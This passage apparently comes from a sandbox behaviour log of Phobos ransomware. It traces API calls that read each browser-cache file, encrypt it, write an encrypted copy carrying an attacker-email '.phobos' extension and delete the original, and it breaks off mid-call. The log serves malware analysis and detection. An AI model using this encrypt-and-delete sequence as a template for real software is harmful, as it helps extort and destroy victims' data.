[0187.997] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0187.997] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.997] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0187.997] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.997] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0187.997] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0187.997] CloseHandle (hObject=0x124) returned 1 [0187.997] CloseHandle (hObject=0x140) returned 1 [0187.997] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png")) returned 1 [0187.998] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0187.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.999] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=67) returned 1 [0187.999] CloseHandle (hObject=0x140) returned 1 [0187.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini")) returned 0x2006 [0187.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.999] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.000] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0188.000] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.000] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x43, lpOverlapped=0x0) returned 1 [0188.001] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0188.001] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50, lpOverlapped=0x0) returned 1 [0188.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0188.002] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.002] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0188.002] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.003] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0188.003] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.003] CloseHandle (hObject=0x140) returned 1 [0188.003] CloseHandle (hObject=0x124) returned 1 [0188.003] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\desktop.ini")) returned 1 [0188.004] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.009] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=316857) returned 1 [0188.009] CloseHandle (hObject=0x124) returned 1 [0188.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js")) returned 0x2020 [0188.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.009] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.009] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0188.010] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0188.010] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.010] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x4d5b9, lpOverlapped=0x0) returned 1 [0188.096] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4d5c0, dwBufLen=0x4d5c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x4d5c0) returned 1 [0188.099] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x4d5c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x4d5c0, lpOverlapped=0x0) returned 1 [0188.105] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0188.105] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.105] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0188.105] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.105] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0188.105] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.105] CloseHandle (hObject=0x124) returned 1 [0188.105] CloseHandle (hObject=0x140) returned 1 [0188.105] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\ebHtml5Banner[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\ebhtml5banner[1].js")) returned 1 [0188.109] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0188.110] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=21060) returned 1 [0188.110] CloseHandle (hObject=0x140) returned 1 [0188.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg")) returned 0x2020 [0188.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0188.110] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.110] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.158] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0188.158] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.158] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5244, lpOverlapped=0x0) returned 1 [0188.262] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5250, dwBufLen=0x5250 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5250) returned 1 [0188.262] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5250, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5250, lpOverlapped=0x0) returned 1 [0188.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0188.263] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.263] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0188.263] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.263] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0188.264] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.264] CloseHandle (hObject=0x140) returned 1 [0188.264] CloseHandle (hObject=0x124) returned 1 [0188.264] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\eula-win[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\eula-win[1].jpg")) returned 1 [0188.265] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\jquery-1.11.1.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\jquery-1.11.1.min[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.266] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=95790) returned 1 [0188.266] CloseHandle (hObject=0x124) returned 1 [0188.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\jquery-1.11.1.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\jquery-1.11.1.min[1].js")) returned 0x2020 [0188.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\jquery-1.11.1.min[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\jquery-1.11.1.min[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\jquery-1.11.1.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\jquery-1.11.1.min[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0188.266] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.266] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0188.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\jquery-1.11.1.min[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\jquery-1.11.1.min[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0188.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0188.267] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.267] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1762e, lpOverlapped=0x0) returned 1 [0188.635] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x17630, dwBufLen=0x17630 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x17630) returned 1 [0188.636] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x17630, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x17630, lpOverlapped=0x0) returned 1 [0188.638] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0188.638] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0188.638] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0188.638] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.638] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0188.639] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0188.639] CloseHandle (hObject=0x124) returned 1 [0188.639] CloseHandle (hObject=0x140) returned 1 [0188.639] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\jquery-1.11.1.min[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\jquery-1.11.1.min[1].js")) returned 1 [0188.640] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0188.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\rpc_shindig_random[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\rpc_shindig_random[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0188.641] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=12562) returned 1 [0188.641] CloseHandle (hObject=0x140) returned 1 [0188.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\rpc_shindig_random[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\rpc_shindig_random[1].js")) returned 0x2020 [0188.642] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\rpc_shindig_random[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\rpc_shindig_random[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\rpc_shindig_random[1].js" (normalized: "c:\\users\\5p5nrgjn0js 